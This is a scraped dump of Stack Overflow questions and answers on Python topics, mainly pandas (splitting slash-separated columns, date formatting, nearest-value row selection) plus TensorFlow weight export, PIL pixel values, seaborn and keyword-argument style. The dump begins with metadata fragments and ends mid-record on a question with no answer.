3
2016-08-01T23:21:52Z
[ "python", "dictionary" ]
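The fix described in the answer above boils down to opening the output file in exactly one place. A minimal, self-contained sketch of that append pattern (the paths and record values here are hypothetical stand-ins for the asker's Windows paths, using a temporary directory instead):

```python
import json
import os
import tempfile

def append_record(path, record):
    # Open in append mode and write one JSON object per line ("JSON Lines"),
    # so each call adds a record instead of truncating or duplicating it.
    with open(path, "a") as f:
        json.dump(record, f)
        f.write("\n")

out = os.path.join(tempfile.mkdtemp(), "final.txt")
append_record(out, {"filename": "2016-01.txt", "content": "oil data"})
append_record(out, {"filename": "2016-02.txt", "content": "more oil data"})

with open(out) as f:
    records = [json.loads(line) for line in f]
```

Reading the file back line by line recovers one dict per input file, which is usually easier to post-process than concatenated JSON objects.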
Python Pandas: Split slash separated strings in two or more columns into multiple rows
38,709,423
<p>I have a pandas dataframe that looks like this:</p> <pre><code>SUBJECT STUDENT CITY STATE Math/Chemistry/Biology Sam/Peter/Mary Los Angeles CA Geology/Physics John Boston MA </code></pre> <p>This is how it should look:</p> <pre><code>SUBJECT STUDENT CITY STATE Math Sam Los Angeles CA Chemistry Peter Los Angeles CA Biology Mary Los Angeles CA Geology John Boston MA Physics John Boston MA </code></pre> <p>Before asking this question, I referred to the solutions mentioned in this page: <a href="http://stackoverflow.com/questions/17116814/pandas-how-do-i-split-text-in-a-column-into-multiple-rows">pandas: How do I split text in a column into multiple rows?</a></p> <p>Since there are slash-separated strings in two columns, I am not able to use the solutions in the above link.</p>
2
2016-08-01T23:09:12Z
38,709,640
<p>First thing, split fields by <code>'/'</code></p> <pre><code>df.SUBJECT = df.SUBJECT.str.split('/') df.STUDENT = df.STUDENT.str.split('/') </code></pre> <p>Then I use a function to explode rows. However, I had to segregate those rows that only had one student or subject.</p> <pre><code>def explode(df, columns): idx = np.repeat(df.index, df[columns[0]].str.len()) a = df.T.reindex_axis(columns).values concat = np.concatenate([np.concatenate(a[i]) for i in range(a.shape[0])]) p = pd.DataFrame(concat.reshape(a.shape[0], -1).T, idx, columns) return pd.concat([df.drop(columns, axis=1), p], axis=1).reset_index(drop=True) cond = df.STUDENT.str.len() == df.SUBJECT.str.len() df_paired = df[cond] df_unpard = df[~cond] if not df_paired.empty: df_paired = explode(df_paired, ['STUDENT','SUBJECT']) if not df_unpard.empty: df_unpard = explode(explode(df_unpard, ['STUDENT']), ['SUBJECT']) </code></pre> <p>Finally</p> <pre><code>pd.concat([df_paired, df_unpard], ignore_index=True)[df.columns] </code></pre> <p><a href="http://i.stack.imgur.com/topQc.png" rel="nofollow"><img src="http://i.stack.imgur.com/topQc.png" alt="enter image description here"></a></p> <hr> <h3>Timing</h3> <p><strong><em>piRSquared</em></strong></p> <pre><code>%%timeit df = df_.copy() df.SUBJECT = df.SUBJECT.str.split('/') df.STUDENT = df.STUDENT.str.split('/') def explode(df, columns): idx = np.repeat(df.index, df[columns[0]].str.len()) a = df.T.reindex_axis(columns).values concat = np.concatenate([np.concatenate(a[i]) for i in range(a.shape[0])]) p = pd.DataFrame(concat.reshape(a.shape[0], -1).T, idx, columns) return pd.concat([df.drop(columns, axis=1), p], axis=1).reset_index(drop=True) cond = df.STUDENT.str.len() == df.SUBJECT.str.len() df_paired = df[cond] df_unpard = df[~cond] if not df_paired.empty: df_paired = explode(df_paired, ['STUDENT','SUBJECT']) if not df_unpard.empty: df_unpard = explode(explode(df_unpard, ['STUDENT']), ['SUBJECT']) pd.concat([df_paired, df_unpard], 
ignore_index=True)[df.columns] 100 loops, best of 3: 7.76 ms per loop </code></pre> <hr> <p><strong><em>jezrael</em></strong></p> <pre><code>%%timeit df = df_.copy() s1 = df.SUBJECT.str.split('/', expand=True).stack() s2 = df.STUDENT.str.split('/', expand=True).stack() df1 = pd.concat([s1,s2], axis=1, keys=('SUBJECT','STUDENT')) \ .ffill() \ .reset_index(level=1, drop=True) df.drop(['SUBJECT','STUDENT'], axis=1) \ .join(df1) \ .reset_index(drop=True)[['SUBJECT', 'STUDENT', 'CITY','STATE']] 100 loops, best of 3: 5.13 ms per loop </code></pre>
3
2016-08-01T23:35:59Z
[ "python", "pandas", "dataframe" ]
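The pairing logic used by the answers to this question can be sketched in plain Python, independent of pandas, with the sample rows from the question; a lone student is repeated across that row's subjects:

```python
rows = [
    ("Math/Chemistry/Biology", "Sam/Peter/Mary", "Los Angeles", "CA"),
    ("Geology/Physics", "John", "Boston", "MA"),
]

out = []
for subject, student, city, state in rows:
    subjects = subject.split("/")
    students = student.split("/")
    if len(students) == 1:
        # a single student is repeated for every subject on the row
        students = students * len(subjects)
    for sub, stu in zip(subjects, students):
        out.append((sub, stu, city, state))
```

This is exactly the expansion both pandas answers implement, just without the index bookkeeping.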
Python Pandas: Split slash separated strings in two or more columns into multiple rows
38,709,423
<p>I have a pandas dataframe that looks like this:</p> <pre><code>SUBJECT STUDENT CITY STATE Math/Chemistry/Biology Sam/Peter/Mary Los Angeles CA Geology/Physics John Boston MA </code></pre> <p>This is how it should look:</p> <pre><code>SUBJECT STUDENT CITY STATE Math Sam Los Angeles CA Chemistry Peter Los Angeles CA Biology Mary Los Angeles CA Geology John Boston MA Physics John Boston MA </code></pre> <p>Before asking this question, I referred to the solutions mentioned in this page: <a href="http://stackoverflow.com/questions/17116814/pandas-how-do-i-split-text-in-a-column-into-multiple-rows">pandas: How do I split text in a column into multiple rows?</a></p> <p>Since there are slash-separated strings in two columns, I am not able to use the solutions in the above link.</p>
2
2016-08-01T23:09:12Z
38,710,301
<p>Try this: the case where <code>STUDENT</code> has only one entry is handled by repeating it, and <code>zip</code> is then used to pair subjects with students. </p> <pre><code>df3.SUBJECT = df3.SUBJECT.str.split('/') df3.STUDENT = df3.STUDENT.str.split('/') def splitter(gb): ll = [] subs, stus = gb.SUBJECT.values[0], gb.STUDENT.values[0] if len(stus) == len(subs): ll = zip(subs,stus) elif len(stus) == 1: ll = zip(subs,stus*len(subs)) return pd.DataFrame(ll, columns= (["SUBJECT","STUDENT"])) df = df3.groupby(['CITY','STATE'])['SUBJECT','STUDENT'].apply(splitter).reset_index().drop('level_2', axis =1) print df[[ 'SUBJECT', 'STUDENT', 'CITY','STATE' ]] SUBJECT STUDENT CITY STATE 0 Geology John Boston MA 1 Physics John Boston MA 2 Math Sam LosAngeles CA 3 Chemistry Peter LosAngeles CA 4 Biology Mary LosAngeles CA </code></pre>
1
2016-08-02T01:05:23Z
[ "python", "pandas", "dataframe" ]
Python Pandas: Split slash separated strings in two or more columns into multiple rows
38,709,423
<p>I have a pandas dataframe that looks like this:</p> <pre><code>SUBJECT STUDENT CITY STATE Math/Chemistry/Biology Sam/Peter/Mary Los Angeles CA Geology/Physics John Boston MA </code></pre> <p>This is how it should look:</p> <pre><code>SUBJECT STUDENT CITY STATE Math Sam Los Angeles CA Chemistry Peter Los Angeles CA Biology Mary Los Angeles CA Geology John Boston MA Physics John Boston MA </code></pre> <p>Before asking this question, I referred to the solutions mentioned in this page: <a href="http://stackoverflow.com/questions/17116814/pandas-how-do-i-split-text-in-a-column-into-multiple-rows">pandas: How do I split text in a column into multiple rows?</a></p> <p>Since there are slash-separated strings in two columns, I am not able to use the solutions in the above link.</p>
2
2016-08-01T23:09:12Z
38,713,282
<p>Another solution with <a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.concat.html" rel="nofollow"><code>concat</code></a> and <a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.join.html" rel="nofollow"><code>join</code></a>:</p> <pre><code>s1 = df.SUBJECT.str.split('/', expand=True).stack() s2 = df.STUDENT.str.split('/', expand=True).stack() print (s1) 0 0 Math 1 Chemistry 2 Biology 1 0 Geology 1 Physics print (s2) 0 0 Sam 1 Peter 2 Mary 1 0 John dtype: object </code></pre> <pre><code>df1 = pd.concat([s1,s2], axis=1, keys=('SUBJECT','STUDENT')) \ .ffill() \ .reset_index(level=1, drop=True) print (df1) SUBJECT STUDENT 0 Math Sam 0 Chemistry Peter 0 Biology Mary 1 Geology John 1 Physics John df = df.drop(['SUBJECT','STUDENT'], axis=1) \ .join(df1) \ .reset_index(drop=True)[['SUBJECT', 'STUDENT', 'CITY','STATE']] print (df) SUBJECT STUDENT CITY STATE 0 Math Sam Los Angeles CA 1 Chemistry Peter Los Angeles CA 2 Biology Mary Los Angeles CA 3 Geology John Boston MA 4 Physics John Boston MA </code></pre>
2
2016-08-02T06:36:17Z
[ "python", "pandas", "dataframe" ]
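Assuming pandas is available, the concat/join recipe above runs as follows; an explicit `dropna()` is added because newer pandas versions of `stack()` no longer drop the padding NaNs by default:

```python
import pandas as pd

df = pd.DataFrame({
    "SUBJECT": ["Math/Chemistry/Biology", "Geology/Physics"],
    "STUDENT": ["Sam/Peter/Mary", "John"],
    "CITY": ["Los Angeles", "Boston"],
    "STATE": ["CA", "MA"],
})

# split each column into one stacked value per part, dropping the padding
s1 = df.SUBJECT.str.split("/", expand=True).stack().dropna()
s2 = df.STUDENT.str.split("/", expand=True).stack().dropna()

# forward-fill so a lone student is repeated for every subject of his row
pairs = (pd.concat([s1, s2], axis=1, keys=("SUBJECT", "STUDENT"))
           .ffill()
           .reset_index(level=1, drop=True))

out = (df.drop(["SUBJECT", "STUDENT"], axis=1)
         .join(pairs)
         .reset_index(drop=True)[["SUBJECT", "STUDENT", "CITY", "STATE"]])
```

Joining on the (now duplicated) row index is what fans each original row out into one row per subject/student pair.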
checking multiple usernames and passwords in PyCharm Robot Framework using a for loop
38,709,431
<p>I am trying to check multiple usernames and passwords for testing in Robot Framework using PyCharm. I am using Mac El Capitan. Please help me out. I am trying to use the method given in the Robot Framework Guide. Also, is it possible or not? Or do I have to use an Excel sheet or a Python file? Please let me know. This is the piece of code I'm trying:</p> <pre><code> *** Settings *** Library Selenium2Library Resource ../Resources/Common.robot Resource ../Resources/Yahoor.robot Test Setup Common.Begin Browser #Test Teardown Common.End Browser Library string *** Variables *** ${BROWSER} = firefox ${URL} = https://login.yahoo.com/config/login?.src=fpctx&amp;.intl=ca&amp;.lang=en-CA&amp;.done=https://ca.yahoo.com/ ${PASS} = **** *** Test Cases *** Yahoo Login Check Positive Testing [Tags] Positive [Documentation] Check for positive test @{STR} Create List user1 user2 : FOR ${Item} IN @{STR} Yahoor.Verify Display Yahoor.Input Email-id Yahoor.Check Pass Page Yahoor.Input Pass Credentials </code></pre>
1
2016-08-01T23:10:31Z
38,717,068
<p>you can first call and retrieve all users in database and set them in a variable for example BODY and then get the username and passwords from the jsonbody <code>:FOR ${ELEMENT} IN @{BODY.json()}</code> and call your other keywords</p>
0
2016-08-02T09:47:48Z
[ "python", "pycharm", "robotframework" ]
Upgraded Seaborn 0.7.0 to 0.7.1, getting AttributeError for missing axlabel
38,709,439
<p>Having trouble with my upgrade to Seaborn 0.7.1. Conda only has 0.7.0 so I removed it and installed 0.7.1 with pip.</p> <p>I am now getting this error:</p> <p><code>AttributeError: module 'seaborn' has no attribute 'axlabel'</code></p> <p>from this line of code</p> <p><code>sns.axlabel(xlabel="SAMPLE GROUP", ylabel=y_label, fontsize=16)</code></p> <p>I removed and reinstalled 0.7.0 and it fixed the issue. However, in 0.7.1, axlabel appears to still be there and I didn't see anything about changes to it in the release notes. What am I missing? </p>
1
2016-08-01T23:11:28Z
38,718,933
<p>Changes were made in 0.7.1 to clean up the top-level namespace a bit. <code>axlabel</code> was not used anywhere in the documentation, so it was moved to make the main functions more discoverable. You can still access it with <code>sns.utils.axlabel</code>. Sorry for the inconvenience.</p> <p>Note that it's usually just as easy to do <code>ax.set(xlabel="...", ylabel="...")</code>, though it won't get you exactly what you want here because you can't set the size to something different than the default in that line.</p>
1
2016-08-02T11:16:20Z
[ "python", "seaborn" ]
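The suggested `ax.set(...)` workaround can be sketched with plain Matplotlib (assuming a headless Agg backend; the font size is applied to the label objects separately, since `ax.set()` does not accept it):

```python
import matplotlib
matplotlib.use("Agg")  # headless backend; no display required
import matplotlib.pyplot as plt

fig, ax = plt.subplots()
ax.set(xlabel="SAMPLE GROUP", ylabel="value")
# fontsize has to be set on the label objects themselves
ax.xaxis.label.set_size(16)
ax.yaxis.label.set_size(16)
```

For the original one-liner behavior, `sns.utils.axlabel(...)` remains available as the answer notes.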
Python: assigning a variable using the random function
38,709,441
<p>I am new to Python with no prior coding experience. I am using "Python Programming for the Absolute Beginner" by Mike Dawson to learn this language. One of the assignments is to simulate a fortune cookie: the program should display one of five unique fortunes at random each time it's run.</p> <p>I have written the below code, but am unable to successfully run the program:</p> <pre><code># Fortune Cookie # Demonstrates random message generation import random print("\t\tFortune Cookie") print("\t\tWelcome user!") # fortune messages m1 = "The earth is a school learn in it." m2 = "Be calm when confronting an emergency crisis." m3 = "You never hesitate to tackle the most difficult problems." m4 = "Hard words break no bones, fine words butter no parsnips." m5 = "Make all you can, save all you can, give all you can." message = random.randrange(m1, m5) print("Your today's fortune " , message ) input("\n\nPress the enter key to exit") </code></pre>
0
2016-08-01T23:11:33Z
38,709,596
<p>Your error is in <code>message = random.randrange(m1, m5)</code>. The method only takes integers as parameters. You should try putting your sentences in a list instead and test the following:</p> <pre><code>import random print("\t\tFortune Cookie") print("\t\tWelcome user!") messages = [ "The earth is a school learn in it.", "Be calm when confronting an emergency crisis.", "You never hesitate to tackle the most difficult problems.", "Hard words break no bones, fine words butter no parsnips.", "Make all you can, save all you can, give all you can." ] print("Your today's fortune ", random.choice(messages)) input("\n\nPress the enter key to exit") </code></pre> <p><code>random.choice</code> will take a random element from the list. You could also generate a random number and call by index, but that's not as clear:</p> <pre><code>index = random.randint(0, len(messages) - 1) print("Your today's fortune ", messages[index]) </code></pre>
0
2016-08-01T23:30:12Z
[ "python" ]
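The core of the fix is that `random.randrange` only takes integers, while `random.choice` picks directly from a sequence. A stripped-down sketch (messages shortened for brevity):

```python
import random

messages = [
    "The earth is a school learn in it.",
    "Be calm when confronting an emergency crisis.",
    "You never hesitate to tackle the most difficult problems.",
]

# random.choice picks one element directly
fortune = random.choice(messages)

# equivalent, using an index drawn from range(len(messages))
index = random.randrange(len(messages))
fortune_by_index = messages[index]
```

Both forms always return an element of the list; `choice` just hides the index arithmetic.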
Save or export weights and biases in TensorFlow for non-Python replication
38,709,517
<p>I've built a neural network that performs reasonably well, and I'd like to replicate my model in a non-Python environment. I set up my network as follows:</p> <pre><code>sess = tf.InteractiveSession() x = tf.placeholder(tf.float32, shape=[None, 23]) y_ = tf.placeholder(tf.float32, shape=[None, 2]) W = tf.Variable(tf.zeros([23,2])) b = tf.Variable(tf.zeros([2])) sess.run(tf.initialize_all_variables()) y = tf.nn.softmax(tf.matmul(x,W) + b) </code></pre> <p>How can I obtain a decipherable .csv or .txt of my weights and biases?</p> <p>EDIT: Below is my full script:</p> <pre><code>import csv import numpy import tensorflow as tf data = list(csv.reader(open("/Users/sjayaram/developer/TestApp/out/production/TestApp/data.csv"))) [[float(j) for j in i] for i in data] numpy.random.shuffle(data) results=data #delete results from data data = numpy.delete(data, [23, 24], 1) #delete data from results results = numpy.delete(results, range(23), 1) sess = tf.InteractiveSession() x = tf.placeholder(tf.float32, shape=[None, 23]) y_ = tf.placeholder(tf.float32, shape=[None, 2]) W = tf.Variable(tf.zeros([23,2])) b = tf.Variable(tf.zeros([2])) sess.run(tf.initialize_all_variables()) y = tf.nn.softmax(tf.matmul(x,W) + b) cross_entropy = tf.reduce_mean(-tf.reduce_sum(y_ * tf.log(y), reduction_indices=[1])) train_step = tf.train.GradientDescentOptimizer(0.5).minimize(cross_entropy) #train the model, saving 80 entries for testing #batch-size: 40 for i in range(0, 3680, 40): train_step.run(feed_dict={x: data[i:i+40], y_: results[i:i+40]}) correct_prediction = tf.equal(tf.argmax(y,1), tf.argmax(y_,1)) accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32)) print(accuracy.eval(feed_dict={x: data[3680:], y_: results[3680:]})) </code></pre>
0
2016-08-01T23:20:49Z
38,709,631
<p>You can fetch the variables as NumPy arrays, and use <a href="http://docs.scipy.org/doc/numpy/reference/generated/numpy.savetxt.html" rel="nofollow"><code>numpy.savetxt()</code></a> to write out the contents as text or CSV:</p> <pre><code>import numpy as np W_val, b_val = sess.run([W, b]) np.savetxt("W.csv", W_val, delimiter=",") np.savetxt("b.csv", b_val, delimiter=",") </code></pre> <p>Note that this is unlikely to give performance as good as using TensorFlow's native replication mechanisms, in the <a href="https://www.tensorflow.org/versions/r0.10/how_tos/distributed/index.html" rel="nofollow">distributed runtime</a>.</p>
1
2016-08-01T23:34:35Z
[ "python", "machine-learning", "neural-network", "tensorflow" ]
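The export step itself needs no TensorFlow at all; a sketch of the `savetxt` round trip on stand-in weight values shaped like the question's `W` (23x2) and `b` (2,):

```python
import os
import tempfile

import numpy as np

# stand-in values for the fetched W and b arrays
W_val = np.arange(46, dtype=float).reshape(23, 2)
b_val = np.array([0.5, -0.5])

outdir = tempfile.mkdtemp()
np.savetxt(os.path.join(outdir, "W.csv"), W_val, delimiter=",")
np.savetxt(os.path.join(outdir, "b.csv"), b_val, delimiter=",")

# the non-Python consumer only needs to parse comma-separated floats back
W_back = np.loadtxt(os.path.join(outdir, "W.csv"), delimiter=",")
b_back = np.loadtxt(os.path.join(outdir, "b.csv"), delimiter=",")
```

The round trip is lossless up to the default text precision, which is plenty for replicating a softmax layer.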
How to Format a Date Column in Pandas?
38,709,558
<p>I have a dataframe <code>df</code> that look like this:</p> <pre><code> ID Date 0 1 2008-01-24 1 2 2007-02-17 </code></pre> <p>The format of <code>Date</code> is <code>%Y-%m-%d</code></p> <p>How can I format the dates to <code>%m-%d-%Y</code> format?</p> <p>I tried using this syntax but it did not give the right format:</p> <pre><code>df["Date"] = df["Date"].strftime("%m-%d-%Y") </code></pre> <p>Any idea how to solve this?</p>
0
2016-08-01T23:24:46Z
38,709,590
<p>Use the <a href="http://pandas.pydata.org/pandas-docs/stable/basics.html#dt-accessor" rel="nofollow"><code>.dt</code></a> accessor:</p> <pre><code>df["Date"] = df["Date"].dt.strftime("%m-%d-%Y") </code></pre>
2
2016-08-01T23:28:37Z
[ "python", "datetime", "pandas", "dataframe", "format" ]
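A self-contained sketch with the question's sample dates; the column must be datetime dtype before the `.dt` accessor applies:

```python
import pandas as pd

df = pd.DataFrame({"ID": [1, 2], "Date": ["2008-01-24", "2007-02-17"]})
df["Date"] = pd.to_datetime(df["Date"])        # ensure datetime dtype
df["Date"] = df["Date"].dt.strftime("%m-%d-%Y")
```

Note that after `strftime` the column holds plain strings, so this should be the last formatting step before output.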
six.b(literal) same as b'literal'? Python 2/3
38,709,567
<p>I have a piece of code, are these two equivalent? I understand that <code>six</code> module is used for making code compatible with both 2 and 3.</p> <pre><code>from six import b os.write(w, b("EMount unsuccessful")) os.write(w, b"EMount unsuccessful") </code></pre>
1
2016-08-01T23:26:15Z
38,709,724
<p>It depends on the python version you are using. In 2.6 or higher, those are equivalent and you can use u instead of u().</p>
2
2016-08-01T23:48:11Z
[ "python" ]
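Since `six` may not be installed everywhere, the equivalence is easy to check with the literal form alone (valid syntax in Python 2.6+ and all of Python 3):

```python
data = b"EMount unsuccessful"

# on Python 3 this is bytes; on Python 2.6+ it is str (which is the bytes type there)
assert isinstance(data, bytes)
assert data == "EMount unsuccessful".encode("ascii")
```

`six.b()` only earns its keep when targeting Python versions older than 2.6, where the `b''` prefix does not exist.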
Divide numpy matrix elements in 2-D matrix by sum of all elements in that position of 1-D
38,709,570
<p>If we have a matrix such as:</p> <p>[ [ 2, 3 ] , [ 4, 9 ], [ 3, 1 ] ]</p> <p>I want to know how to be able to divide matrix elements as follows:</p> <p>Sum the elements in the same position of their respective 1-D vectors</p> <p>2 + 4 + 3 = 9</p> <p>3 + 9 + 1 = 13</p> <p>Then divide each of the elements by the sum corresponding to their position</p> <p>Desired output:</p> <p>[ [ .22, .23 ], [ .44, .69 ], [ .33, .08 ] ]</p>
0
2016-08-01T23:26:26Z
38,709,634
<h3>One solution:</h3> <pre><code>import numpy as np data = [[2, 3] , [4, 9], [3, 1]] result = data / np.sum(data, axis=0) print(result) </code></pre> <h3>Output:</h3> <blockquote> <p>[[ 0.22222222 0.23076923] <br> [ 0.44444444 0.69230769] <br> [ 0.33333333 0.07692308]]</p> </blockquote>
2
2016-08-01T23:35:19Z
[ "python", "numpy", "matrix" ]
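The same column-wise normalization, with the intermediate sums made visible; NumPy broadcasting divides the (3, 2) array by the (2,)-shaped column sums:

```python
import numpy as np

data = np.array([[2, 3], [4, 9], [3, 1]])

col_sums = data.sum(axis=0)        # sums down each column: [9, 13]
result = data / col_sums           # broadcasts (3, 2) / (2,)
```

Each column of `result` then sums to 1, which is a quick sanity check for this kind of normalization.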
Returning rows in a dataframe closest to a list of integers
38,709,595
<p>I have a dataframe with multiple columns and a few 1000 rows with text data. One column contains floats that represent time in ascending order (0, 0.45, 0.87, 1.10 etc). From this I want to build a new dataframe that contains only all the rows where these time values are closest to the integers x = 0,1,2,3......etc</p> <p>Here on Stackoverflow I found an answer to a very similar question, answer posted by DSM. The code is essentially this, modified (hopefully) to give -the- closest number to x, df is my data frame. </p> <pre><code>df.loc[(df.ElapsedTime-x).abs().argsort()[:1]] </code></pre> <p>This seems to essentially do what I need for one x value but I can't figure out how to iterate this over the -entire- data frame to extract -all- rows where the column value is closest to x = 0,1,2,3....in ascending order. This code gives me a data frame, there must be a way to loop this and append the resulting data frames to get the desired result?</p> <p>I have tried this:</p> <pre><code>L=[] for x in np.arange(len(df)): L.append(df.loc[(df.ElapsedTime-x).abs().argsort()[:1]]) L </code></pre> <p>L, in principle has the right rows but it is a messy list and it takes a long time to execute because for loops are not a great way to iterate over a data frame. I'd prefer to get a data frame as the result.</p> <p>I feel I am missing something trivial. </p> <p>Not sure how to post the desired dataframe.</p> <p>Lets say the timevalues are (taken from my dataframe):</p> <pre><code>0.00,0.03,0.58,1.59,1.71,1.96,2.21,2.33,2.46,2.58,2.7,2.83,2.95,3.07 </code></pre> <p>The values grabbed for 0,1,2,3 would be 0, .58, 1.96, 2.95</p> <p>@beroe: if the numbers are 0.8, 1.1, 1.4, 2.8, in this case 1.1 should be grabbed for 1 and 1.4 should be grabbed for 2. If as an example the numbers are 0.5 1.5 2.5. While I think it is unlikely this will happen in my data I think it would be fine to grab 1.5 as 1 and 2.5 as 2. 
In this application I don't think it is that critical, although I am not sure how I would implement this.</p> <p>Please let me know if anyone needs any additional info.</p>
2
2016-08-01T23:30:04Z
38,709,798
<p>Consider the following <code>pd.Series</code> <code>s</code></p> <pre><code>s = pd.Series(np.arange(5000), np.random.rand(5000) * 100).sort_index() s.head() 0.002587 3007 0.003418 4332 0.060767 2045 0.125182 3179 0.134487 4614 dtype: int64 </code></pre> <p>Get all integers to get closest to with:</p> <pre><code>idx = (s.index // 1).unique() </code></pre> <p>Then reindex with <code>method='nearest'</code></p> <pre><code>s.reindex(idx, method='nearest').head() 0.0 3912 1.0 3617 2.0 2574 3.0 811 4.0 932 dtype: int64 </code></pre>
1
2016-08-01T23:58:40Z
[ "python", "python-3.x", "pandas" ]
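Applied to the elapsed times listed in the question, the `reindex(method='nearest')` idea reproduces the expected picks (this assumes the float index is unique and sorted, which it is for an ascending time column):

```python
import pandas as pd

times = [0.00, 0.03, 0.58, 1.59, 1.71, 1.96, 2.21, 2.33,
         2.46, 2.58, 2.70, 2.83, 2.95, 3.07]

s = pd.Series(times, index=times)          # each value is its own timestamp
nearest = s.reindex([0, 1, 2, 3], method="nearest")
```

In the real dataframe one would index by the `ElapsedTime` column and reindex the whole frame the same way, keeping one row per integer second.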
Returning rows in a dataframe closest to a list of integers
38,709,595
<p>I have a dataframe with multiple columns and a few 1000 rows with text data. One column contains floats that represent time in ascending order (0, 0.45, 0.87, 1.10 etc). From this I want to build a new dataframe that contains only all the rows where these time values are closest to the integers x = 0,1,2,3......etc</p> <p>Here on Stackoverflow I found an answer to a very similar question, answer posted by DSM. The code is essentially this, modified (hopefully) to give -the- closest number to x, df is my data frame. </p> <pre><code>df.loc[(df.ElapsedTime-x).abs().argsort()[:1]] </code></pre> <p>This seems to essentially do what I need for one x value but I can't figure out how to iterate this over the -entire- data frame to extract -all- rows where the column value is closest to x = 0,1,2,3....in ascending order. This code gives me a data frame, there must be a way to loop this and append the resulting data frames to get the desired result?</p> <p>I have tried this:</p> <pre><code>L=[] for x in np.arange(len(df)): L.append(df.loc[(df.ElapsedTime-x).abs().argsort()[:1]]) L </code></pre> <p>L, in principle has the right rows but it is a messy list and it takes a long time to execute because for loops are not a great way to iterate over a data frame. I'd prefer to get a data frame as the result.</p> <p>I feel I am missing something trivial. </p> <p>Not sure how to post the desired dataframe.</p> <p>Lets say the timevalues are (taken from my dataframe):</p> <pre><code>0.00,0.03,0.58,1.59,1.71,1.96,2.21,2.33,2.46,2.58,2.7,2.83,2.95,3.07 </code></pre> <p>The values grabbed for 0,1,2,3 would be 0, .58, 1.96, 2.95</p> <p>@beroe: if the numbers are 0.8, 1.1, 1.4, 2.8, in this case 1.1 should be grabbed for 1 and 1.4 should be grabbed for 2. If as an example the numbers are 0.5 1.5 2.5. While I think it is unlikely this will happen in my data I think it would be fine to grab 1.5 as 1 and 2.5 as 2. 
In this application I don't think it is that critical, although I am not sure how I would implement this.</p> <p>Please let me know if anyone needs any additional info.</p>
2
2016-08-01T23:30:04Z
38,709,881
<p>Don't know how fast this would be, but you could round the times to get "integer" candidates, take the absolute value of the difference to give yourself a way to find the closest, then sort by difference, and then <code>groupby</code> the integer time to return just the rows that are close to integers:</p> <pre><code># setting up my fake data df=pd.DataFrame() df['ElapsedTime']=pd.Series([0.5, 0.8, 1.1, 1.4, 1.8, 2.2, 3.1]) # To use your own data set, set df = Z, and start here... df['bintime'] = df.ElapsedTime.round() df['d'] = abs(df.ElapsedTime - df.bintime) dfindex = df.sort('d').groupby('bintime').first() </code></pre> <p>For the fake time series defined above, the contents of <code>dfindex</code> is:</p> <pre><code> ElapsedTime d bintime 0 0.5 0.5 1 1.1 0.1 2 1.8 0.2 3 3.1 0.1 </code></pre>
1
2016-08-02T00:10:47Z
[ "python", "python-3.x", "pandas" ]
RGB Values Being Returned by PIL don't match RGB color
38,709,618
<p>I'm attempting to make a reasonably simple code that will be able to read the size of an image and return all the RGB values. I'm using PIL on Python 2.7, and my code goes like this:</p> <pre><code>import os, sys from PIL import Image img = Image.open('C:/image.png') pixels = img.load() print(pixels[0, 1]) </code></pre> <p>now this code was actually gotten off of this site as a way to read a gif file. I'm trying to get the code to print out an RGB tuple (in this case (55, 55, 55)) but all it gives me is a small sequence of unrelated numbers, usually containing 34.</p> <p>I have tried many other examples of code, whether from here or not, but it doesn't seem to work. Is it something wrong with the .png format? Do I need to further code in the rgb part? I'm happy for any help.</p>
0
2016-08-01T23:32:25Z
38,709,975
<p>My guess is that your image file is using pre-multiplied alpha values. The <code>8</code> values you see are pretty close to <code>55*34/255</code> (where <code>34</code> is the alpha channel value).</p> <p>PIL uses the mode <code>"RGBa"</code> (with a little <code>a</code>) to indicate when it's using premultiplied alpha. You may be able to tell PIL to convert it to normal <code>"RGBA"</code>, where the pixels will have roughly the values you expect:</p> <pre><code>img = Image.open('C:/image.png').convert("RGBA") </code></pre> <p>Note that if your image isn't supposed to be partly transparent at all, you may have larger issues going on. We can't help you with that without knowing more about your image.</p>
4
2016-08-02T00:21:52Z
[ "python", "python-imaging-library", "rgb" ]
Are there any dangers associated with using kwarg=kwarg in Python functions?
38,709,667
<p>I've sometimes seen code with kwarg=kwarg in one of the functions as shown below:</p> <pre><code>def func1(foo, kwarg): return(foo+kwarg) def func2(bar, kwarg): return(func1(bar*2, kwarg=kwarg)) print(func2(4,5)) </code></pre> <p>I've normally tried to avoid this notation (e.g. by using kwarg1=kwarg2) in order to avoid any possible bugs, but is this actually necessary?</p>
0
2016-08-01T23:40:45Z
38,709,915
<p>There's nothing <em>wrong</em> with it - in this case <code>kwarg</code> is just a variable name - it's not reserved. There may be a bit of confusion with it though, since <code>def func(**kwargs):</code> is the common syntax for creating a dictionary of all the "key word arguments" that are passed into the function. Since you're not doing that here, using such a similar name is unnecessarily confusing. Although it's not clear you're talking about using that exact name, so maybe this is just an issue with the example.</p> <p>But broadly speaking, passing <code>something=something</code> is fairly common practice. You'll see it in lots of places, for example if you're iterating through a color palette in Matplotlib, you might pass <code>color=color</code> into <code>plot</code>, or if you're building a list of headers in Pandas you might pass <code>columns=columns</code> into <code>DataFrame</code>.</p> <p>Bottom line is it should be clear. If it is, it's good. If it's not, it isn't. </p>
2
2016-08-02T00:14:51Z
[ "python", "function", "notation", "keyword-argument" ]
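A tiny sketch of the pattern under discussion; `greeting=greeting` simply forwards the caller's keyword under the same name (all names here are made up for illustration):

```python
def greet(name, greeting="hi"):
    return "{}, {}".format(greeting, name)

def shout_greet(name, greeting="hi"):
    # forward the keyword argument unchanged, same name on both sides
    return greet(name.upper(), greeting=greeting) + "!"
```

The left side is the parameter name in the callee, the right side is the local variable in the caller; they happen to coincide, which is harmless.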
drop hour, min, sec from timestamp?
38,709,670
<p>I want to convert a date from SAS, 14487, to 1999-08-31.</p> <p>How can I convert the current result '1999-08-31 00:00:00' to '1999-08-31'? I've tried ser.normalize(), but it doesn't help.</p> <pre><code>ser = pd.to_timedelta(14487, unit='D') + pd.Timestamp('1960-1-1') ser.normalize() </code></pre> <p>yields</p> <pre><code>Timestamp('1999-08-31 00:00:00') </code></pre>
2
2016-08-01T23:40:48Z
38,709,697
